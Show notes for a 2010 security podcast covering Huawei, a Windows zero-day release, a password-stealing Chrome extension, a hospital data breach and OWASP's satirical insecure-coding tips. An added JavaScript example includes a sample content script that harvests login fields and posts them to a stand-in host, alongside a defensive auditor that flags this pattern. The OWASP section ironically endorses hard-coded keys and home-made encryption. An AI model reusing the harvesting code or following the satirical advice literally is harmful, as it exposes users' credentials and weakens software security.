ISDPodcast Episode 170 for July 12, 2010. In this episode we will discuss Huawei, MSRC, Chrome, Lincoln Medical & OWASP tips. This podcast was hosted by Rick Hayes and the intern, Karthik Rangarajan.
Announcements:
MyHardDriveDied.com:
- MHDD Data Recovery Class current dates and locations:
- Dallas, TX – October 11th – 15th
- SANS: Drive and Data Recovery Forensics Sep 20th-24th (Mon-Fri) (https://www.sans.org/registration/register.php?conferenceid=21967)
- Washington, DC – December 6th – 10th
- Cost is $3500 for all classes. To reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com Use the Discount Code: isdpodcast for a $300 discount.
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, October 12, 2010 – Tuesday, December 14, 2010 (http://www.sans.org/mentor/details.php?nid=21538). Use the Discount Code: isdpod15 for a 15% discount.
Atlanta ISSA:
- ISSA International Conference – September 16, 2010 (http://www.issa.org/page/?p=105)
- SANS 560: Network Penetration Testing and Ethical Hacking – September 17-22, 2010 (http://www.sans.org/atlanta-2010-cs2/description.php?tid=3142)
- SANS 577: Virtualization Security Fundamentals – September 17 & 18 (http://www.sans.org/atlanta-2010-cs2/description.php?tid=3807)
9am-5pm US ET
Hilton Atlanta Airport Hotel
1031 Virginia Avenue
Atlanta, GA 30354
The Louisville Metro InfoSec Conference
Thursday, October 7th, 2010 at Churchill Downs (http://www.louisvilleinfosec.com)
Registrations made between now and July 16th, 2010 receive a 50% DISCOUNT on the $99 ticket price! After July 16th the ticket price will go back to normal.
Friends of the Podcast:
Webhosting services: WebSpeedway
Stories of Interest:
Updates:
Corrections:
News Item 1a: http://www.totaltele.com/view.aspx?ID=456959
Chinese vendor working on wireless broadband deal with U.S. operator in bid to further its North American ambitions. Huawei is bidding to sell mobile network equipment to U.S. operator Sprint Nextel, despite security concerns from the U.S. government regarding Chinese equipment makers, according to a press report.
Citing unnamed sources, the Financial Times late Thursday reported that the Chinese vendor is driving to secure its first major U.S. contract. If successful it will sell mobile broadband network kit to Sprint Nextel, the paper said.
Sprint Nextel offers mobile broadband services via what it terms its 4G network, which is based on WiMAX technology. The press report did not explicitly state that the deal Huawei is working on is for WiMAX equipment. Furthermore, the FT did not report that Huawei already supplies WiMAX equipment to Sprint’s partner Clearwire in the U.S.
News Item 1b: http://www.fiercewireless.com/story/hauwei-hires-u-s-advisers-alleviate-security-concerns/2010-07-12
News item 2: http://news.softpedia.com/news/Upset-Security-Researchers-Start-Releasing-Microsoft-0Days-146251.shtml
A group of security researchers calling themselves the Microsoft-Spurned Researcher Collective (MSRC) have released full details and exploitation code for an unpatched Windows local privilege escalation vulnerability. The researchers openly stated that they will continue to do so in response to how Microsoft treated Tavis Ormandy, the Google engineer blamed for disclosing a critical Windows bug publicly last month.
The name is clearly a pun directed at Microsoft’s Security Response Center (MSRC), while Tavis Ormandy is the Google engineer who disclosed the Windows XP Help Center vulnerability that is currently being exploited in the wild. Ormandy has taken a lot of heat from both Microsoft and from others in the security community for publishing details about an unpatched critical vulnerability in the public domain.
According to Security Focus, the bug exposed by the so called “Microsoft-Spurned Researcher Collective” can lead to local privilege escalation. “An attacker may exploit this issue to execute arbitrary code with kernel-level privileges, however, this has not been confirmed. Successful exploits will result in the complete compromise of affected computers,” the Security Focus advisory reads.
The upset security researchers poke more fun at Microsoft in their disclosure. For example, their workaround section tells the company to locate the HKCU\Microsoft\Windows\CurrentVersion\Security registry key and change the “OurJob” boolean value to FALSE. They even include an email address that others willing to join the cause can use to make contact.
News Item 3: http://thenextweb.com/google/2010/07/09/hacker-creates-plugin-that-trashes-chromes-security
An exploit, developed by programmer Andreas Grech, employs a plugin coded using jQuery to track users’ login information and have it emailed to him. He claims that he has tested the plugin, and that it has been successful against Twitter, Gmail, and Facebook. In his own words,
The Google Chrome browser allows the installation of third-party extensions that are used to extend the browser to add new features. The extensions are written in JavaScript and HTML and allow manipulation of the DOM, amongst other features.
By allowing access to the DOM, an attacker can thus read form fields…including username and password fields. This is what sparked my idea of creating this PoC.
The extension I present here is very simple. Whenever a user submits a form, it tries to capture the username and password fields, sends me an email via an Ajax call to a script with these login details along with the url and then proceeds to submit the form normally so as to avoid detection.
He has included the code for the plug-in on his website.
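As an added illustration for this story (it is not Grech's extension and contains no code from his post), the Node-runnable JavaScript below does two things: it reproduces the field-harvesting decision a content script of the kind he describes has to make on every form submit, written over plain field descriptors so it runs without a browser DOM, and it gives the check an extension reviewer would actually want, a static triage pass over a manifest and its content-script sources that flags the same "injected everywhere, reads passwords, hooks submit, phones home" shape. The sample manifest, script text and host name (collector.example) are constructed for the example.

```javascript
// Added example, not code from Grech's post or his extension.
// (1) the harvesting decision a credential-stealing content script makes on form submit,
//     over plain field descriptors so it runs in Node without a DOM;
// (2) a static triage check over an extension manifest plus its content-script sources.

// fields: [{ name, type, value }], the shape a content script gets from form.elements.
function findCredentialFields(fields) {
  const pwIndex = fields.findIndex((f) => f.type === 'password');
  if (pwIndex === -1) return null; // no password box: nothing to steal
  // The username box is usually the last text/email input before the password box.
  let user = null;
  for (let i = pwIndex - 1; i >= 0; i--) {
    if (fields[i].type === 'text' || fields[i].type === 'email') { user = fields[i]; break; }
  }
  return { username: user ? user.value : null, password: fields[pwIndex].value };
}

// Host patterns that inject a content script into every site the user visits.
const BROAD_MATCHES = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

// Text heuristics over the manifest and scripts. Noisy on purpose: a cheap first pass
// that surfaces the "injected everywhere + reads passwords + hooks submit + phones home" shape.
function auditExtension(manifest, sources) {
  const findings = [];
  const scripts = manifest.content_scripts || [];
  if (scripts.some((cs) => (cs.matches || []).some((m) => BROAD_MATCHES.has(m)))) {
    findings.push('content script injected into every site');
  }
  const src = Object.values(sources).join('\n');
  if (/password/i.test(src)) findings.push('references password fields');
  if (/\.submit\(|['"]submit['"]/.test(src)) findings.push('hooks form submission');
  if (/XMLHttpRequest|\$\.(ajax|post|get)\(|\bfetch\(/.test(src)) {
    findings.push('sends requests from the content script');
  }
  const risk = findings.length >= 3 ? 'high' : findings.length > 0 ? 'review' : 'low';
  return { risk, findings };
}

// Constructed sample: a manifest and jQuery content script of the shape described in the story.
const SAMPLE_MANIFEST = {
  name: 'Helpful Toolbar',
  version: '1.0',
  content_scripts: [{ matches: ['<all_urls>'], js: ['jquery.js', 'content.js'] }],
};
const SAMPLE_SOURCES = {
  'content.js': `
$('form').submit(function () {
  var u = $(this).find('input[type=text],input[type=email]').first().val();
  var p = $(this).find('input[type=password]').val();
  $.post('http://collector.example/log', { url: location.href, u: u, p: p });
  // then let the form submit normally so the user notices nothing
});`,
};

// Constructed benign extension for contrast: one site, no form or network access.
const BENIGN_MANIFEST = {
  name: 'Mail Theme',
  version: '1.0',
  content_scripts: [{ matches: ['https://mail.example/*'], js: ['theme.js'] }],
};
const BENIGN_SOURCES = { 'theme.js': "document.body.classList.add('dark');" };

console.log('suspicious:', auditExtension(SAMPLE_MANIFEST, SAMPLE_SOURCES));
console.log('benign:', auditExtension(BENIGN_MANIFEST, BENIGN_SOURCES));
```

The audit is a triage filter, not a verdict: a password manager legitimately matches every one of these heuristics, so a "high" result means "read the content script by hand", and the broad host match is the finding that matters most, since it is what turns a single-site nuisance into a credential harvester for every site the user logs into.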
News item 4: http://www.theregister.co.uk/2010/06/30/patient_data_exposed/
New York-based Lincoln Medical and Mental Health Center has become one of the latest medical providers to expose highly sensitive patient data after CDs containing unencrypted data sent by FedEx never made it to their destination.
The breach exposed medical and psychological diagnoses and procedures for 130,495 patients, according to a notice posted Tuesday. The CDs, which remain missing despite an investigation that was launched in early April, also contained names, addresses, social security numbers, medical record numbers, dates of birth and other details that are regularly snarfed up by identity thieves.
In a letter sent to affected patients, hospital officials said they have no knowledge the missing information has been accessed by anyone.
Lincoln’s notification to the US Department of Health website came the same day officials at the University of Maine said sensitive details for 4,585 individuals who sought services at the school’s counseling center have been stolen by hackers who compromised two servers. The exposed data included names, clinical information and social security numbers for people who used the service over an eight-year span ending last week.
News item 5: http://www.owasp.org/index.php/How_to_write_insecure_code
Continuing our coverage of the OWASP “How to write insecure code” page with its Encryption section
Build your own encryption scheme
The standard encryption mechanisms are way too complicated to use. It’s much easier to make up an encryption algorithm that scrambles up secret stuff. You don’t need to bother with a key or anything, just mix it all up and nobody will figure it out.
Hard-code your keys
Hard-coding is the best way to retain control. This way those pesky operations folks won’t be able to monkey with (they say “rotate”) the keys, and they’ll be locked into the source code where only smart people can understand them. This will also make it easier to move from environment to environment as the hard-coded key will be the same everywhere. This in turn means your code is secure everywhere.
Smart coders don’t read manuals
Just keep adding bytes until the algorithm stops throwing exceptions. Or just save yourself time and cut-and-paste from a popular coding site. This looks like a good start: byte[] keyBytes = new byte[] { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17 };
Pack up your sensitive payload
If you need to pass things that are sensitive, like passwords or PII, just pack it up in an encrypted blob. Then just email the key to the developer who is coding the other side of the transaction, and punch out early. This will also get you past Data Loss Prevention (DLP) tools which is a huge bonus.
Encryption is hard
A great way to improve the security posture of your site is to use client-side JavaScript to encrypt passwords and other sensitive data that are submitted. This can be used with or without HTTPS (TLS/SSL). If you use it without HTTPS, you can save some money by skipping the annual purchase of a signed third party certificate.
HTTPS makes your application bullet proof
If you use HTTPS encryption between your web application endpoint and the client, there is absolutely no way for anyone to steal any of the data that is transmitted.